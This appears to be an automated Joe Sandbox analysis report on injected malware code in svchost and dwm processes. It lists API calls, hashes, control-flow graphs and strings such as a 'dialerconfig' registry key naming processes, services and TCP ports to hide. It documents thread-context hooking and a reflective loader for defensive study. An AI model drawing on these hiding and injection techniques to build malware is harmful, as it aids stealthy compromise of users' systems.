                                                              • Instruction ID: 93a3ced56bc647de6299b8a1905d2a6032edb69f7bc4320d41604ef82ca62c1f
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: AEE08666F10B4481DF028F71E4441D87368EB5AF54B8C9122C95C07311EF3CD2E9C301
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 72cf71b4c8bcd0622c645fc165e77207b5f5e2b8a8cfb2fde8c47a753de635a3
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: FC115B75B01B8482EA04DB66A80D22A73E9EB8AFC5F1C4028DE4E67765DFBCC446C341
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.3073333010.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_2a661300000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: b5369b631e5731d7a483f2840394a7dd6d44661382897b8f9f01a4c4ceb7f075
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 18E065B5B01A4487EB088FA2D80D34A36E5FB8AF06F09C024CD0A07361DFFD8499CB91

                                                              Execution Graph

                                                              Execution Coverage:1.7%
                                                              Dynamic/Decrypted Code Coverage:95.3%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:127
                                                              Total number of Limit Nodes:16
                                                              execution_graph 14881 2baaedb3ab9 14886 2baaedb3a06 14881->14886 14882 2baaedb3a70 14883 2baaedb3a56 VirtualQuery 14883->14882 14883->14886 14884 2baaedb3a8a VirtualAlloc 14884->14882 14885 2baaedb3abb GetLastError 14884->14885 14885->14882 14885->14886 14886->14882 14886->14883 14886->14884 14887 2baaedb28c8 14889 2baaedb290e 14887->14889 14888 2baaedb2970 14889->14888 14891 2baaedb3844 14889->14891 14892 2baaedb3866 14891->14892 14893 2baaedb3851 StrCmpNIW 14891->14893 14892->14889 14893->14892 14894 2baaedb554d 14896 2baaedb5554 14894->14896 14895 2baaedb55bb 14896->14895 14897 2baaedb5637 VirtualProtect 14896->14897 14898 2baaedb5663 GetLastError 14897->14898 14899 2baaedb5671 14897->14899 14898->14899 14900 2baaedb1abc 14905 2baaedb1628 GetProcessHeap 14900->14905 14902 2baaedb1ad2 Sleep SleepEx 14903 2baaedb1acb 14902->14903 14903->14902 14904 2baaedb1598 StrCmpIW StrCmpW 14903->14904 14904->14903 14906 2baaedb1648 _invalid_parameter_noinfo 14905->14906 14950 2baaedb1268 GetProcessHeap 14906->14950 14908 2baaedb1650 14909 2baaedb1268 2 API calls 14908->14909 14910 2baaedb1661 14909->14910 14911 2baaedb1268 2 API calls 14910->14911 14912 2baaedb166a 14911->14912 14913 2baaedb1268 2 API calls 14912->14913 14914 2baaedb1673 14913->14914 14915 2baaedb168e RegOpenKeyExW 14914->14915 14916 2baaedb18a6 14915->14916 14917 2baaedb16c0 RegOpenKeyExW 14915->14917 14916->14903 14918 2baaedb16e9 14917->14918 14919 2baaedb16ff RegOpenKeyExW 14917->14919 14961 2baaedb12bc RegQueryInfoKeyW 14918->14961 14921 2baaedb1723 14919->14921 14922 2baaedb173a RegOpenKeyExW 14919->14922 14954 2baaedb104c RegQueryInfoKeyW 14921->14954 14923 2baaedb1775 RegOpenKeyExW 14922->14923 14924 2baaedb175e 14922->14924 14929 2baaedb1799 14923->14929 14930 2baaedb17b0 RegOpenKeyExW 14923->14930 14928 2baaedb12bc 13 API calls 14924->14928 14931 2baaedb176b RegCloseKey 14928->14931 14932 2baaedb12bc 13 API calls 14929->14932 14933 
2baaedb17d4 14930->14933 14934 2baaedb17eb RegOpenKeyExW 14930->14934 14931->14923 14935 2baaedb17a6 RegCloseKey 14932->14935 14936 2baaedb12bc 13 API calls 14933->14936 14937 2baaedb1826 RegOpenKeyExW 14934->14937 14938 2baaedb180f 14934->14938 14935->14930 14941 2baaedb17e1 RegCloseKey 14936->14941 14939 2baaedb184a 14937->14939 14940 2baaedb1861 RegOpenKeyExW 14937->14940 14942 2baaedb104c 5 API calls 14938->14942 14944 2baaedb104c 5 API calls 14939->14944 14945 2baaedb1885 14940->14945 14946 2baaedb189c RegCloseKey 14940->14946 14941->14934 14943 2baaedb181c RegCloseKey 14942->14943 14943->14937 14947 2baaedb1857 RegCloseKey 14944->14947 14948 2baaedb104c 5 API calls 14945->14948 14946->14916 14947->14940 14949 2baaedb1892 RegCloseKey 14948->14949 14949->14946 14972 2baaedc6168 14950->14972 14952 2baaedb1283 GetProcessHeap 14953 2baaedb12ae _invalid_parameter_noinfo 14952->14953 14953->14908 14955 2baaedb11b5 RegCloseKey 14954->14955 14956 2baaedb10bf 14954->14956 14955->14922 14956->14955 14957 2baaedb10cf RegEnumValueW 14956->14957 14959 2baaedb1125 _invalid_parameter_noinfo 14957->14959 14958 2baaedb114e GetProcessHeap 14958->14959 14959->14955 14959->14957 14959->14958 14960 2baaedb116e GetProcessHeap HeapFree 14959->14960 14960->14959 14962 2baaedb1327 GetProcessHeap 14961->14962 14963 2baaedb148a RegCloseKey 14961->14963 14969 2baaedb133e _invalid_parameter_noinfo 14962->14969 14963->14919 14964 2baaedb1352 RegEnumValueW 14964->14969 14965 2baaedb1476 GetProcessHeap HeapFree 14965->14963 14967 2baaedb13d3 GetProcessHeap 14967->14969 14968 2baaedb141e lstrlenW GetProcessHeap 14968->14969 14969->14964 14969->14965 14969->14967 14969->14968 14970 2baaedb13f3 GetProcessHeap HeapFree 14969->14970 14971 2baaedb1443 StrCpyW 14969->14971 14973 2baaedb152c 14969->14973 14970->14968 14971->14969 14974 2baaedb157c 14973->14974 14977 2baaedb1546 14973->14977 14974->14969 14975 2baaedb1565 StrCmpW 14975->14977 14976 2baaedb155d StrCmpIW 14976->14977 14977->14974 
14977->14975 14977->14976 14978 2baaed8273c 14979 2baaed8276a 14978->14979 14980 2baaed827c5 VirtualAlloc 14979->14980 14983 2baaed828d4 14979->14983 14982 2baaed827ec 14980->14982 14980->14983 14981 2baaed82858 LoadLibraryA 14981->14982 14982->14981 14982->14983 14984 2baaedb5cf0 14985 2baaedb5cfd 14984->14985 14986 2baaedb5d09 14985->14986 14993 2baaedb5e1a 14985->14993 14987 2baaedb5d3e 14986->14987 14988 2baaedb5d8d 14986->14988 14989 2baaedb5d66 SetThreadContext 14987->14989 14989->14988 14990 2baaedb5e41 VirtualProtect FlushInstructionCache 14990->14993 14991 2baaedb5efe 14992 2baaedb5f1e 14991->14992 15006 2baaedb43e0 14991->15006 15002 2baaedb4df0 GetCurrentProcess 14992->15002 14993->14990 14993->14991 14996 2baaedb5f23 14997 2baaedb5f77 14996->14997 14998 2baaedb5f37 ResumeThread 14996->14998 15010 2baaedb7940 14997->15010 14999 2baaedb5f6b 14998->14999 14999->14996 15001 2baaedb5fbf 15005 2baaedb4e0c 15002->15005 15003 2baaedb4e53 15003->14996 15004 2baaedb4e22 VirtualProtect FlushInstructionCache 15004->15005 15005->15003 15005->15004 15007 2baaedb43fc 15006->15007 15008 2baaedb445f 15007->15008 15009 2baaedb4412 VirtualFree 15007->15009 15008->14992 15009->15007 15011 2baaedb7949 15010->15011 15012 2baaedb7954 15011->15012 15013 2baaedb812c IsProcessorFeaturePresent 15011->15013 15012->15001 15014 2baaedb8144 15013->15014 15017 2baaedb8320 RtlCaptureContext 15014->15017 15016 2baaedb8157 15016->15001 15018 2baaedb833a RtlLookupFunctionEntry 15017->15018 15019 2baaedb8389 15018->15019 15020 2baaedb8350 RtlVirtualUnwind 15018->15020 15019->15016 15020->15018 15020->15019

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 78f03bd58bd771501ec832d631cf30a0ec79085d488701881cd05dbf4638cb85
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 7171F536710A11C6EB119F76E89869933B4FB88F88F201125DE8E97B69EF38C454C761

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: c18b6d392aacd81c24e9439981193182f378ecf4105ae0e7c3b89df64e219d94
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 6611232A704B8182FB299B21E40866973B0FB88F85F640029EE9D07B94EF2DC505D726

                                                              Control-flow Graph

                                                              control_flow_graph 59 2baaedb5b30-2baaedb5b57 60 2baaedb5b59-2baaedb5b68 59->60 61 2baaedb5b6b-2baaedb5b76 GetCurrentThreadId 59->61 60->61 62 2baaedb5b82-2baaedb5b89 61->62 63 2baaedb5b78-2baaedb5b7d 61->63 65 2baaedb5b9b-2baaedb5baf 62->65 66 2baaedb5b8b-2baaedb5b96 call 2baaedb5960 62->66 64 2baaedb5faf-2baaedb5fc6 call 2baaedb7940 63->64 67 2baaedb5bbe-2baaedb5bc4 65->67 66->64 70 2baaedb5c95-2baaedb5cb6 67->70 71 2baaedb5bca-2baaedb5bd3 67->71 77 2baaedb5cbc-2baaedb5cdc GetThreadContext 70->77 78 2baaedb5e1f-2baaedb5e30 call 2baaedb74bf 70->78 74 2baaedb5bd5-2baaedb5c18 call 2baaedb85c0 71->74 75 2baaedb5c1a-2baaedb5c8d call 2baaedb4510 call 2baaedb44b0 call 2baaedb4470 71->75 88 2baaedb5c90 74->88 75->88 81 2baaedb5ce2-2baaedb5d03 77->81 82 2baaedb5e1a 77->82 91 2baaedb5e35-2baaedb5e3b 78->91 81->82 90 2baaedb5d09-2baaedb5d12 81->90 82->78 88->67 94 2baaedb5d14-2baaedb5d25 90->94 95 2baaedb5d92-2baaedb5da3 90->95 96 2baaedb5e41-2baaedb5e98 VirtualProtect FlushInstructionCache 91->96 97 2baaedb5efe-2baaedb5f0e 91->97 101 2baaedb5d27-2baaedb5d3c 94->101 102 2baaedb5d8d 94->102 105 2baaedb5e15 95->105 106 2baaedb5da5-2baaedb5dc3 95->106 103 2baaedb5ec9-2baaedb5ef9 call 2baaedb78ac 96->103 104 2baaedb5e9a-2baaedb5ea4 96->104 99 2baaedb5f10-2baaedb5f17 97->99 100 2baaedb5f1e-2baaedb5f2a call 2baaedb4df0 97->100 99->100 108 2baaedb5f19 call 2baaedb43e0 99->108 120 2baaedb5f2f-2baaedb5f35 100->120 101->102 110 2baaedb5d3e-2baaedb5d88 call 2baaedb3970 SetThreadContext 101->110 102->105 103->91 104->103 111 2baaedb5ea6-2baaedb5ec1 call 2baaedb4390 104->111 106->105 112 2baaedb5dc5-2baaedb5e10 call 2baaedb3900 call 2baaedb74dd 106->112 108->100 110->102 111->103 112->105 124 2baaedb5f77-2baaedb5f95 120->124 125 2baaedb5f37-2baaedb5f75 ResumeThread call 2baaedb78ac 120->125 128 2baaedb5fa9 124->128 129 2baaedb5f97-2baaedb5fa6 124->129 125->120 128->64 129->128
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                              • Instruction ID: 31c15b6048437d5f0528e898c8b124e688204c93d2b6d14f8daac9b72cf6a32a
                                                              • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                              • Instruction Fuzzy Hash: BCD1AD76205B8886EB70DB06E49835AB7B1F7C8B84F200616EACD87BA5DF3CC551CB11

                                                              Control-flow Graph

                                                              control_flow_graph 131 2baaedb50d0-2baaedb50fc 132 2baaedb510d-2baaedb5116 131->132 133 2baaedb50fe-2baaedb5106 131->133 134 2baaedb5118-2baaedb5120 132->134 135 2baaedb5127-2baaedb5130 132->135 133->132 134->135 136 2baaedb5132-2baaedb513a 135->136 137 2baaedb5141-2baaedb514a 135->137 136->137 138 2baaedb5156-2baaedb5161 GetCurrentThreadId 137->138 139 2baaedb514c-2baaedb5151 137->139 141 2baaedb5163-2baaedb5168 138->141 142 2baaedb516d-2baaedb5174 138->142 140 2baaedb56d3-2baaedb56da 139->140 141->140 143 2baaedb5176-2baaedb517c 142->143 144 2baaedb5181-2baaedb518a 142->144 143->140 145 2baaedb5196-2baaedb51a2 144->145 146 2baaedb518c-2baaedb5191 144->146 147 2baaedb51a4-2baaedb51c9 145->147 148 2baaedb51ce-2baaedb5225 call 2baaedb56e0 * 2 145->148 146->140 147->140 153 2baaedb5227-2baaedb522e 148->153 154 2baaedb523a-2baaedb5243 148->154 157 2baaedb5236 153->157 158 2baaedb5230 153->158 155 2baaedb5255-2baaedb525e 154->155 156 2baaedb5245-2baaedb5252 154->156 159 2baaedb5273-2baaedb5298 call 2baaedb7870 155->159 160 2baaedb5260-2baaedb5270 155->160 156->155 157->154 162 2baaedb52a6-2baaedb52aa 157->162 161 2baaedb52b0-2baaedb52b6 158->161 172 2baaedb532d-2baaedb5342 call 2baaedb3cc0 159->172 173 2baaedb529e 159->173 160->159 164 2baaedb52e5-2baaedb52eb 161->164 165 2baaedb52b8-2baaedb52d4 call 2baaedb4390 161->165 162->161 167 2baaedb5315-2baaedb5328 164->167 168 2baaedb52ed-2baaedb530c call 2baaedb78ac 164->168 165->164 175 2baaedb52d6-2baaedb52de 165->175 167->140 168->167 178 2baaedb5344-2baaedb534c 172->178 179 2baaedb5351-2baaedb535a 172->179 173->162 175->164 178->162 180 2baaedb536c-2baaedb53ba call 2baaedb8c60 179->180 181 2baaedb535c-2baaedb5369 179->181 184 2baaedb53c2-2baaedb53ca 180->184 181->180 185 2baaedb54d7-2baaedb54df 184->185 186 2baaedb53d0-2baaedb54bb call 2baaedb7440 184->186 187 2baaedb5523-2baaedb552b 185->187 188 2baaedb54e1-2baaedb54f4 call 2baaedb4590 185->188 198 
2baaedb54bd 186->198 199 2baaedb54bf-2baaedb54ce call 2baaedb4060 186->199 191 2baaedb5537-2baaedb5546 187->191 192 2baaedb552d-2baaedb5535 187->192 202 2baaedb54f8-2baaedb5521 188->202 203 2baaedb54f6 188->203 196 2baaedb5548 191->196 197 2baaedb554f 191->197 192->191 195 2baaedb5554-2baaedb5561 192->195 200 2baaedb5564-2baaedb55b9 call 2baaedb85c0 195->200 201 2baaedb5563 195->201 196->197 197->195 198->185 207 2baaedb54d2 199->207 208 2baaedb54d0 199->208 210 2baaedb55c8-2baaedb5661 call 2baaedb4510 call 2baaedb4470 VirtualProtect 200->210 211 2baaedb55bb-2baaedb55c3 200->211 201->200 202->185 203->187 207->184 208->185 216 2baaedb5663-2baaedb5668 GetLastError 210->216 217 2baaedb5671-2baaedb56d1 210->217 216->217 217->140
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                              • Instruction ID: 23740bbe660f02b17626632bc15792137b8cb4ce1fdb553318e7db32c27e2220
                                                              • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                              • Instruction Fuzzy Hash: 7A02C832219B848AEBA0DB55F49435AB7B1F3C4794F201516EACE87BA8EF7CC454CB11

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocQuery
                                                              • String ID:
                                                              • API String ID: 31662377-0
                                                              • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction ID: 7a5abf18ac2a88b042ef8e55c3e5550eddf82e52636a0b843c26b095b24f542b
                                                              • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction Fuzzy Hash: DD311E22619B8485FB70DA15E05935EB7B4F388784F300525F6CE46BA8EFBDC580DB26

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 2ad3ca4f40750c63b75b568ed666e8e8af952458ac097145c83ebf84f034f196
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: F011803061064082FB60AB35F84D35A33B4E794B44F745129E9CE81691FFB9C444D273

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                              • String ID:
                                                              • API String ID: 3733156554-0
                                                              • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                              • Instruction ID: dd3a5a768425e10e9621753640c41d4571e2c807aa16a46606a8960c8ce9cfd1
                                                              • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                              • Instruction Fuzzy Hash: FDF0DA26218B04C5E630DB05E49975EBBB0F388BD4F245216FACD47B69EB3CC691CB61

                                                              Control-flow Graph

                                                              control_flow_graph 265 2baaed8273c-2baaed827a4 call 2baaed829d4 * 4 274 2baaed829b2 265->274 275 2baaed827aa-2baaed827ad 265->275 277 2baaed829b4-2baaed829d0 274->277 275->274 276 2baaed827b3-2baaed827b6 275->276 276->274 278 2baaed827bc-2baaed827bf 276->278 278->274 279 2baaed827c5-2baaed827e6 VirtualAlloc 278->279 279->274 280 2baaed827ec-2baaed8280c 279->280 281 2baaed82838-2baaed8283f 280->281 282 2baaed8280e-2baaed82836 280->282 283 2baaed82845-2baaed82852 281->283 284 2baaed828df-2baaed828e6 281->284 282->281 282->282 283->284 287 2baaed82858-2baaed8286a LoadLibraryA 283->287 285 2baaed82992-2baaed829b0 284->285 286 2baaed828ec-2baaed82901 284->286 285->277 286->285 288 2baaed82907 286->288 289 2baaed828ca-2baaed828d2 287->289 290 2baaed8286c-2baaed82878 287->290 293 2baaed8290d-2baaed82921 288->293 289->287 291 2baaed828d4-2baaed828d9 289->291 294 2baaed828c5-2baaed828c8 290->294 291->284 296 2baaed82982-2baaed8298c 293->296 297 2baaed82923-2baaed82934 293->297 294->289 295 2baaed8287a-2baaed8287d 294->295 301 2baaed828a7-2baaed828b7 295->301 302 2baaed8287f-2baaed828a5 295->302 296->285 296->293 299 2baaed82936-2baaed8293d 297->299 300 2baaed8293f-2baaed82943 297->300 303 2baaed82970-2baaed82980 299->303 304 2baaed82945-2baaed8294b 300->304 305 2baaed8294d-2baaed82951 300->305 306 2baaed828ba-2baaed828c1 301->306 302->306 303->296 303->297 304->303 307 2baaed82963-2baaed82967 305->307 308 2baaed82953-2baaed82961 305->308 306->294 307->303 310 2baaed82969-2baaed8296c 307->310 308->303 310->303
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091263440.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaed80000_dwm.jbxd
                                                              Similarity
                                                              • API ID: AllocLibraryLoadVirtual
                                                              • String ID:
                                                              • API String ID: 3550616410-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: edf19ca3480a1da74097dc63c541a873bc22b60532e016aa43ba4ca51d0254c4
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: D5610172B016D08BDB54DF19940873DB3B2FB64BA4F688521DE9D07788DB38D852C721

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 000002BAAEDB1628: GetProcessHeap.KERNEL32 ref: 000002BAAEDB1633
                                                                • Part of subcall function 000002BAAEDB1628: HeapAlloc.KERNEL32 ref: 000002BAAEDB1642
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB16B2
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB16DF
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB16F9
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1719
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1734
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1754
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB176F
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB178F
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB17AA
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB17CA
                                                              • Sleep.KERNEL32 ref: 000002BAAEDB1AD7
                                                              • SleepEx.KERNELBASE ref: 000002BAAEDB1ADD
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB17E5
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1805
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1820
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB1840
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB185B
                                                                • Part of subcall function 000002BAAEDB1628: RegOpenKeyExW.ADVAPI32 ref: 000002BAAEDB187B
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB1896
                                                                • Part of subcall function 000002BAAEDB1628: RegCloseKey.ADVAPI32 ref: 000002BAAEDB18A0
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 5897a26a41a4aef26239da29d92159dd846d94d21f5a3ab815abeae03d819eb0
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 0931336131164192FF649B26DA493A933F4EB85BC0F3454299E8D877D5FF24C851C237


                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: a276db4f4c99bc7a332c3aa6f38ea54ad7e67eb6164bf7f066872a3ece57c91a
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 7FB1AF23220A5082FBA59F2AD4487AD73B5F784F94F645016EE8D93798EF35CC40C7A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: de49e428489568a9a1c1efdf934af856d60b8aa7fbf2d7bd99ae0cf3bd723102
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 68315E72215B808AEB609F70E8847ED7374F784744F54452ADB8E57B98EF38C648C721
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.3091297271.000002BAAEDB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDB0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_2baaedb0000_dwm.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: fb6e2855a87a0ff13252f3cfd112d920f0755c5f39388b13f5746e8061f6324b
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
